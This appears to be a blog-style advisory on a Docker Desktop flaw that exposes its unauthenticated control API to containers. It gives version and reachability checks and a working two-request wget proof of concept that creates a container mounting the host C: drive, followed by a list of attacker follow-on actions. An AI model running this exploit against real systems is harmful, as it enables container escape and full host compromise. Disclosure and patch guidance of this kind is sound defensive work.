Quick vulnerability check - run this now:
## Check your Docker version
docker --version
## If you see anything less than 4.44.3, you're vulnerable
Test if the exploit API is accessible from containers:
## From inside ANY running container, try this:
wget -qO- 192.168.65.7:2375/version 2>/dev/null || echo "API blocked (patched)"
## Alternative if wget isn't available:
curl -f 192.168.65.7:2375/version 2>/dev/null || echo "API blocked (patched)"
If that wget command succeeds and returns JSON, any container on your system can own your host. It's that simple.
How This Exploit Actually Works
Felix Boulet discovered this vulnerability while doing routine network scanning. Docker Desktop exposes its entire control API at the internal IP 192.168.65.7:2375
with zero authentication. Any container that can make HTTP requests can use this API to create new containers with full host access.
Here's the actual exploit - it's embarrassingly simple:
## Step 1: Create a container that mounts your C: drive
wget --header='Content-Type: application/json' \
--post-data='{\"Image\":\"alpine\",\"Cmd\":[\"sh\",\"-c\",\"echo pwned > /host/pwned.txt\"],\"HostConfig\":{\"Binds\":[\"/mnt/host/c:/host\"]}}' \
-O - 192.168.65.7:2375/containers/create > create.json
## Step 2: Start the malicious container
cid=$(cut -d'\"' -f4 create.json)
wget --post-data='' -O - 192.168.65.7:2375/containers/$cid/start
Two HTTP requests. That's it. The attacker now has a container with full access to your C: drive. From there they can:
- Install persistent backdoors in Windows system directories
- Steal browser passwords and cryptocurrency wallets
- Plant ransomware with admin privileges
- Access all your source code and development environments
- Modify system files for long-term persistence
Learn more about container attack techniques from MITRE ATT&CK Container Matrix, NIST Container Security Guidelines, Docker Container Escape Prevention, Linux Container Hardening Guide, Container Runtime Security Best Practices, and Windows Container Security Guidelines.
Windows Gets Completely Fucked
Windows users are especially screwed because WSL2 gives containers admin-level access to mount your entire C: drive. A successful exploit can:
- Overwrite critical system DLLs in
C:\Windows\System32
- Install kernel-level rootkits that survive reboots
- Access encrypted files and break Windows security boundaries
- Create new admin accounts for persistent access
macOS users are somewhat better off - the system still prompts for permission to access certain directories. But once Docker is compromised, attackers control your entire container environment.
Linux users running native Docker Engine (not Desktop) aren't affected by this specific vulnerability, but Desktop users on all platforms need to patch immediately.
Enterprise \"Security\" Won't Save You
Docker's "Enhanced Container Isolation" feature? Completely useless against this vulnerability. Docker's own security bulletin admits ECI "does not mitigate CVE-2025-9074."
All those expensive enterprise security tools scanning container images? They won't catch this because the vulnerability is in Docker's architecture, not in malicious images. Your EDR might catch the aftermath, but by then the attacker already owns your system.
This vulnerability bypasses every container security control because it exploits Docker's own management interface. Traditional container security focuses on what's inside containers - this attack uses Docker's legitimate API to break out.
For more technical details on container escape techniques, see OWASP Container Security Guide, NIST SP 800-190 Container Security, Linux Container Security Guidelines, Docker Security Best Practices, CIS Docker Benchmark, Container Escape Analysis by Trail of Bits, Kubernetes Security Context Documentation, and Container Runtime Security Research.